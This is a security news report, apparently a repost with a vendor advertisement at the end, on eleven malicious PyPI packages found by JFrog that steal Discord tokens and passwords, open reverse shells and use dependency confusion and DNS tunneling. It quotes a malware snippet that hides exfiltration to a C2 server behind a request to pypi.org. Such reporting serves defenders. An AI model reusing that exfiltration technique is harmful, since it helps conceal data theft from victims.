Researchers discovered 11 malicious Python packages in the PyPI repository that can steal Discord access tokens, passwords, and conduct attacks.
JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.
Below is the list of malicious Python packages:
- importantpackage / important-package
- pptest
- ipboards
- owlmoon
- DiscordSafety
- trrfab
- 10Cent10 / 10Cent11
- yandex-yt
- yiffparty
The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.
Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with pypi.org.
“The malware’s communication is quite simple:
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
This code causes an HTTPS request to be sent to pypi.python.org (which is indistinguishable from a legitimate request to PyPI,) which later gets rerouted by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net (and vice versa, allowing for two-way communication).” states the report published by JFrog.
The “ipboards” and “trrfab” packages were able to exfiltrate sensitive information by using a technique called dependency confusion.
The dependency confusion technique consists of uploading tainted components that have the same name as the legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique tricks the target’s package manager into downloading and installing the malicious module.
The “ipboards” and “pptest” packages were discovered using DNS tunneling for data exfiltration, this is the first time that this technique has been used by malicious pac in malware uploaded to PyPI.
“While this set of malicious packages may not have the same ‘teeth’ as our previous discoveries, what’s notable is the increasing level of sophistication with which they are executed. It’s not reaching for your wallet in broad daylight – but there is a lot more subterfuge going on with these packages, and some of them may even be setting up for a follow-up attack after the initial reconnaissance, instead of running a highly-compromising payload to start.” concludes the report.
Follow me on Twitter: @securityaffairs and Facebook
(SecurityAffairs – hacking, Operation Cyclone)
Share On
[ad_2]
Source link
Is your business effected by Cyber Crime?
If a cyber crime or cyber attack happens to you, you need to respond quickly. Cyber crime in its several formats such as online identity theft, financial fraud, stalking, bullying, hacking, e-mail fraud, email spoofing, invoice fraud, email scams, banking scam, CEO fraud. Cyber fraud can lead to major disruption and financial disasters. Digitpol can assist with all stages of cyber related incidents.
Contact Digitpol’s hotlines or respond to us online.
ASIA +85239733884
Europe +31558448040
UK +44 20 8089 9944